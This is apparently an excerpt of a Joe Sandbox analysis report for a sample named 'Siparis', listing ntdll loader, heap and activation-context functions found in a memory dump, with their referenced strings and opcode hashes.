AVRF: -*- final list of providers -*- , xrefs: 01448B8F

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 454806bb525e31647a210128e34b0ef9933fe91f1f46e42d05ce1c3e3ee80e0d
Instruction ID: 5484d82b18975d1afdf59ff4bbb1fce6d9aeabb30532ef009dd0f053371f72f3
Opcode Fuzzy Hash: 454806bb525e31647a210128e34b0ef9933fe91f1f46e42d05ce1c3e3ee80e0d
Instruction Fuzzy Hash: 4191F3B26463139FF726DFACD8C0B5BB7A8AB55618F05081EFA406F371D77098018B95

Function 013CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 013CEB62
, xrefs: 013CF299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 013CEB58
T, xrefs: 013CEB4E
LdrpResSearchResourceInsideDirectory Exit, xrefs: 013CEB6C
{, xrefs: 01424643

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 11939e323c9c10578073c622c2384b24257e25a26686015fdf8797f0f6fd708f
Instruction ID: 9550037f42f29ee6811261e961ac0987500a73065a5b26fe6250764b04126508
Opcode Fuzzy Hash: 11939e323c9c10578073c622c2384b24257e25a26686015fdf8797f0f6fd708f
Instruction Fuzzy Hash: 70A22974A0562A8FDB64DF18C9887A9BBB5EF45708F5442EAD90DA7260DB309EC5CF00

Function 013F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01434258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 014341FE
minkernel\ntdll\ldrinit.c, xrefs: 014340E9, 0143414B, 0143420F, 01434269
Process initialization failed with status 0x%08lx, xrefs: 0143413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 014340D8
_LdrpInitialize, xrefs: 014340DF, 01434141, 01434205, 0143425F

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 255412102268ea38f05b6c67e5655cbc58cc815ccf0a123d98935d9d0616302b
Instruction ID: 22ab7ab39072c41f5c4f2924e78e6c3d53ead3eeb00e5f09cc2f9a3083cbdb26
Opcode Fuzzy Hash: 255412102268ea38f05b6c67e5655cbc58cc815ccf0a123d98935d9d0616302b
Instruction Fuzzy Hash: 0A916CB0B013159BEB35EF59D885BEA7BA5FF94B18F04412EEA007B7A1D7749802C790

Function 013B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 013B6496
LdrpInitShimEngine, xrefs: 014199F4, 01419A07, 01419A30
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01419A01
minkernel\ntdll\ldrinit.c, xrefs: 01419A11, 01419A3A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014199ED
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01419A2A

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 5fce98c274ab4d683f51028a00add048da36a71327593788baf02f5c8d944ef2
Instruction ID: 30f2c3f1599b3567f6bc3aa52e10bc08abc808256d312fa3ad41a1dcea82f518
Opcode Fuzzy Hash: 5fce98c274ab4d683f51028a00add048da36a71327593788baf02f5c8d944ef2
Instruction Fuzzy Hash: 165107722083049FE724DF29D891B9B77E8FB8464CF40491EF645976A5EA30E904CB92

Function 013F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0143219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014321BF
RtlGetAssemblyStorageRoot, xrefs: 01432160, 0143219A, 014321BA
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01432178
SXS: %s() passed the empty activation context, xrefs: 01432165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01432180

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: f26d0cc760fcf30f0e12f316eb2c03129c965220a27ffc6b558fc0ed2ed88642
Instruction ID: 26142c94824bfcf14835620192aaf04df300bbdf964c02a709c2542c5a63b0c9
Opcode Fuzzy Hash: f26d0cc760fcf30f0e12f316eb2c03129c965220a27ffc6b558fc0ed2ed88642
Instruction Fuzzy Hash: 9A31E936B40215B7FB218A9A8D81F5B7B68DBA5A58F05005EFB0467251D2B0DE01C6A1

Function 013FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 01438170
LdrpInitializeImportRedirection, xrefs: 01438177, 014381EB
minkernel\ntdll\ldrredirect.c, xrefs: 01438181, 014381F5
minkernel\ntdll\ldrinit.c, xrefs: 013FC6C3
LdrpInitializeProcess, xrefs: 013FC6C4
Unable to build import redirection Table, Status = 0x%x, xrefs: 014381E5

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: c595ed64fa45489451023742acba26c3d1c7ec0e0d5e84b4126c20f8ac8c372c
Instruction ID: ff8e104065a355ddd72baafdca0ebaf0fc5e59644c420d648626c813f6d11e8e
Opcode Fuzzy Hash: c595ed64fa45489451023742acba26c3d1c7ec0e0d5e84b4126c20f8ac8c372c
Instruction Fuzzy Hash: 8831E4716443069BD224EF2DD886E1BB7D4EF98B18F04051DF9846B3A1D630EC04C7A2

Function 0140096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01402DF0: LdrInitializeThunk.NTDLL ref: 01402DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01400BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01400BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01400D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01400D74

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: e1554961ffd1209ba7a9f275e1cd00fb5b9326877ac62a95b009247b6aea65f9
Instruction ID: 51faafb919908dcf1c58f1b0f94307195c09a1eb15407e9a96b0630ba99d66c5
Opcode Fuzzy Hash: e1554961ffd1209ba7a9f275e1cd00fb5b9326877ac62a95b009247b6aea65f9
Instruction Fuzzy Hash: 10426C71900715DFDB21CF29C880BAAB7F5BF48314F1445AAE989EB391D770AA85CF60

Function 013CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 013CA3EF
8, xrefs: 013CA3E7
LdrResFallbackLangList Exit, xrefs: 013CA3FF
6, xrefs: 013CA3F7

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 63298a0dea42014dea893bc9b5dd2e2a0685240388100fd579e3c2167859da42
Instruction ID: a57fecefd6d0c09ef486cc16a0d577316d96707b2456bf7f3858f189db32e78c
Opcode Fuzzy Hash: 63298a0dea42014dea893bc9b5dd2e2a0685240388100fd579e3c2167859da42
Instruction Fuzzy Hash: F9C1897410838ACFD711DF59C044B6AB7E4BB94B08F00896EF9969B750E774CD49CB52

Function 013F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 013F8421
LdrpInitializeProcess, xrefs: 013F8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013F855E
@, xrefs: 013F8591

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: b2ce917e28f2096573189ac670c8fb78f3677e4c2d3e7531bc8209d9df856721
Instruction ID: 5b4974d8a65780a2d6f18ee69dc47abd5bed10f5c56fe3d59f6970cbdcc95239
Opcode Fuzzy Hash: b2ce917e28f2096573189ac670c8fb78f3677e4c2d3e7531bc8209d9df856721
Instruction Fuzzy Hash: 29918171508345AFDB22EF26CC44FABBAECBF94758F40096EFA8896191D374D904CB52

Function 013F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014321D9, 014322B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014322B6
.Local, xrefs: 013F28D8
SXS: %s() passed the empty activation context, xrefs: 014321DE

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: bae008873a2b5885559663008d28cda32168451c6263e99b88ef35b5d3779a2f
Instruction ID: 3ebd64864c5b2614f421106d658f794975749c4be10a3a508ac587e9d793a725
Opcode Fuzzy Hash: bae008873a2b5885559663008d28cda32168451c6263e99b88ef35b5d3779a2f
Instruction Fuzzy Hash: 11A17A3190122ADBDB25CF69D884BAAB7B5BF58318F1541EADA08A7351D770DE80CF90

Function 013F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid flags 0x%08lx, xrefs: 0143342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01433456
RtlDeactivateActivationContext, xrefs: 01433425, 01433432, 01433451
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01433437

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: d6db669affaa56633a0b50b12b82d9fe63ce3d75f217130179ba6187f49a8b4a
Instruction ID: adfafeff8f853ed48fcd76588c103069396a2e0874e8f6b73f14fc26486d5660
Opcode Fuzzy Hash: d6db669affaa56633a0b50b12b82d9fe63ce3d75f217130179ba6187f49a8b4a
Instruction Fuzzy Hash: 1361F2326407129BDB22CF1DC841B2BB7A5FFA4A58F14852EEA959B361D730EC018B91

Function 013C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0142106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014210AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01421028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01420FE5

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 688247a0ad8891234bbbbc62d366d418951f8cc0bf9e99cf56f70014abdc3cf4
Instruction ID: 14e840b1b8a22e13516fdd59a589f6d55f087e88d04abfd8182a818d61434e6b
Opcode Fuzzy Hash: 688247a0ad8891234bbbbc62d366d418951f8cc0bf9e99cf56f70014abdc3cf4
Instruction Fuzzy Hash: AA710FB19043059FCB21DF19C885F9B7FA8AFA4B68F50042DF9488B296D734D588CBD1

Function 013F4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 0143365C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0143362F
LdrpFindDllActivationContext, xrefs: 01433636, 01433662
minkernel\ntdll\ldrsnap.c, xrefs: 01433640, 0143366C

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 3208d0156cb5f97a8b8bf109e5af453c11609d4eab82f275c9f911cb28b165f3
Instruction ID: 309e64813e4536a2ac7acb97adb47b8452d2cf690bdaa4bb333d3565c99e68e7
Opcode Fuzzy Hash: 3208d0156cb5f97a8b8bf109e5af453c11609d4eab82f275c9f911cb28b165f3
Instruction Fuzzy Hash: 0E31C822A00655ABEF36AE0DD889B67B6A4BB0165CF06412EFB04577F3D7A0DC808795

Function 013E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 013E2462
LdrpDynamicShimModule, xrefs: 0142A998
minkernel\ntdll\ldrinit.c, xrefs: 0142A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0142A992

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 51dcc16f093ca4a809555d2c75735f319cd3627c93bedda640c688a3ce770784
Instruction ID: 27ec41419c7b8dce5decb7ed1fea62636ac2ea277c7bfecbca67dc74d2b39e72
Opcode Fuzzy Hash: 51dcc16f093ca4a809555d2c75735f319cd3627c93bedda640c688a3ce770784
Instruction Fuzzy Hash: 713148B1A00212ABDB319F5ED8C5AAB77B8FF84B04F66041EED0067775D7706881CB40

Function 013D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013D327D
HEAP[%wZ]: , xrefs: 013D3255
HEAP: , xrefs: 013D3264

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 6b12ad36ad081c98a75ce5a7b8c4b5edc87be967f3a492731a195aee3889a8dd
Instruction ID: bffaf1aa82772ef64a10b7258c3151813995baae6fdf4a50d2dbadfb0d361c3a
Opcode Fuzzy Hash: 6b12ad36ad081c98a75ce5a7b8c4b5edc87be967f3a492731a195aee3889a8dd
Instruction Fuzzy Hash: D792CD72A04249DFDB25CF68E4407AEBBF1FF08318F188099E859AB791D734A945CF51

Function 013D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 014250AE
HEAP: , xrefs: 014250BD
(UCRBlock->Size >= *Size), xrefs: 014250CA

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: b6b0bf5b757974a6cfb2c91b350df015a5e5c48deb3a282e9726c0de38498d62
Instruction ID: a419f60ac83f0398f0b57345e8437350ae7cddef5fa81a490e1c873500a9a98a
Opcode Fuzzy Hash: b6b0bf5b757974a6cfb2c91b350df015a5e5c48deb3a282e9726c0de38498d62
Instruction Fuzzy Hash: 6FF1EE71A00606DFEB19CF68D884BBABBB5FF45708F148169E4069B7A1D730E981CF90

Function 013E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0142CA51
@, xrefs: 013E6C24

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 10c0bb702ccc5dc71dcade991d5e5b5847ced08218cd32b760ad077997903cd6
Instruction ID: ea739efadc774e86f4a4d9065d697b3d47d4c385511ba8b934b01edfad1169d5
Opcode Fuzzy Hash: 10c0bb702ccc5dc71dcade991d5e5b5847ced08218cd32b760ad077997903cd6
Instruction Fuzzy Hash: 11C2A2716083659FDB25CF28C485BABBBE5BF88318F04892DF989C7291D734D845CB92

Function 013BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0141C2E6
\??\, xrefs: 0141C1E4
UseFilter, xrefs: 013BA1C1

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 15fb439c65ee33183d30d0671080b3bb94a7d04f1e578102ca61a0d97c1d9470
Instruction ID: 8072a8de249ae1d8b66b073357c1b6ab88bcde6a371c06fc3a637d61f8b81e1f
Opcode Fuzzy Hash: 15fb439c65ee33183d30d0671080b3bb94a7d04f1e578102ca61a0d97c1d9470
Instruction Fuzzy Hash: B2A15D71D416299BDB31DF68CC88BEAB7B8EF44704F1001EADA09A7260E7359E85CF50

Function 013E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 0142A121
Failed to allocated memory for shimmed module list, xrefs: 0142A10F
LdrpCheckModule, xrefs: 0142A117

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: a96331e83e312b38115b3f93209d00067359a1fa93751ff2d543b02c8d6a72c5
Instruction ID: 14c898488959b13c9f5996cf69841033612be0051d9672073d1850a8822adb80
Opcode Fuzzy Hash: a96331e83e312b38115b3f93209d00067359a1fa93751ff2d543b02c8d6a72c5
Instruction Fuzzy Hash: 4B71E270A003169FDF29DFACC984ABEB7F4FB44608F14442DE902AB761D674AD81CB50

Function 013D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0142534D
HEAP[%wZ]: , xrefs: 01425335
HEAP: , xrefs: 01425342

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 713f6ab288da6e52152f92a9c3e67a332f38301c9b3a0f2dfa98720985414668
Instruction ID: 33d6fba2ebcb4c7d2345c176f6e79e3e1b103246536e9a5c2dfeecdb5cfdb352
Opcode Fuzzy Hash: 713f6ab288da6e52152f92a9c3e67a332f38301c9b3a0f2dfa98720985414668
Instruction Fuzzy Hash: C061C071604305DFEB29CF28D484BAABBE5FF44B08F14855EE4998F692D770E881CB91

Function 013FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 014382D7
minkernel\ntdll\ldrinit.c, xrefs: 014382E8
LdrpInitializePerUserWindowsDirectory, xrefs: 014382DE

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 325a220d75e775f54fcfd7a5601d23e449a074d88a9dfd095446e5a328405cda
Instruction ID: 926c94da05c1b1626b2babd372cf90a4960f4ffe91b416cf89f0a0fcc319f4e7
Opcode Fuzzy Hash: 325a220d75e775f54fcfd7a5601d23e449a074d88a9dfd095446e5a328405cda
Instruction Fuzzy Hash: 3141E1B2544305AFDB21EB79D884F5BB7E8EF58658F01492EFA48D72A0E770D804CB91

Function 0147C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0147C212
@, xrefs: 0147C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0147C1C5

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 889bf4daa9a59fd958f431b5cee384f385c38d50b680264df333a486c9b1ec31
Instruction ID: a885de758dd5e4ed8ca0ac16919e03ea67aa1f3252db1b6605cc0a1f2611ffbd
Opcode Fuzzy Hash: 889bf4daa9a59fd958f431b5cee384f385c38d50b680264df333a486c9b1ec31
Instruction Fuzzy Hash: 3A416571E0021AEBDF11DFD9C895FEEB7B8AB14704F14406BE605F7290E7749A458B50

Function 01454144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01454160
LdrpResValidateFilePath Exit, xrefs: 01454172
@, xrefs: 01454225

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 18a6d74f0d3b001ddb8b488eb22d5d9368a74ad500bbd1693cc1406db325b539
Instruction ID: 45e6df6e10bb60e72686af50266fc74f7ed1c990f80988fbb7e499c3aa8b530b
Opcode Fuzzy Hash: 18a6d74f0d3b001ddb8b488eb22d5d9368a74ad500bbd1693cc1406db325b539
Instruction Fuzzy Hash: 46413672A042588BEB21DBD9D844BADBBB4FF55384F18005BED01EF3A2E7348981CB11

Function 01444755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01444888
minkernel\ntdll\ldrredirect.c, xrefs: 01444899
LdrpCheckRedirection, xrefs: 0144488F

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: a37d256fe56009834a9274d51b6f2d9bbc0bd3242952dd10eb8695c5e17ac180
Instruction ID: b0b33e52d8f0e66ef4cded7ccab6e0fc4fa2893cfaf270fa4ffa668f96148f89
Opcode Fuzzy Hash: a37d256fe56009834a9274d51b6f2d9bbc0bd3242952dd10eb8695c5e17ac180
Instruction Fuzzy Hash: 2741D136A006519BFB21CE29D841B27BBE4AF49A50B09055FED48E7372E730D801CB91

Function 013D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01425431
HEAP: , xrefs: 0142543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01425449

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 3682efddae08be3c260b26fa8f448bc195e39021baedd8c9c2f74f9f7a54227e
Instruction ID: 63c82bf8f2a8e4b8e77f30d7c6bd2d0dce2ee11d530d2963755ae24f1f55a01b
